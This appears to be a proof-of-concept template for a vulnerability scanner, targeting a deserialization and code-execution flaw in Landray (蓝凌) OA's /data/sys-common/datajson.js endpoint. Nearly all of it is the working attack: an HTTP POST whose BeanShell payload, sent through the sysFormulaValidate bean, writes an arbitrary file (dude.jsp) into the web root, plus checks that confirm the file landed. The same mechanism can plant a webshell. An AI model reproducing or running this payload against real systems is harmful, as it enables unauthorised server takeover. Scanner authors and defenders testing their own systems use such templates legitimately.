<DudePoc_Name>蓝凌 OA datajson.js 存在反序列化漏洞</DudePoc_Name>
<DudePoc_Description>深圳市蓝凌软件股份有限公司 OA 系统存在反序列化漏洞，攻击者可利用该漏洞获取服务器控制权限。</DudePoc_Description>
<DudePoc_SetHeader>
POST /data/sys-common/datajson.js HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
s_bean=sysFormulaValidate&script=import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"$<AttackCode>$");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("RHVkZQ=="));fout.close();return%201;&type=int&modelName=test
</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>校验通过</DudePoc_VerifyData>
<DudePoc_VerifyFile>/dude.jsp</DudePoc_VerifyFile>
<DudePoc_AttackCode>/dude.jsp</DudePoc_AttackCode>
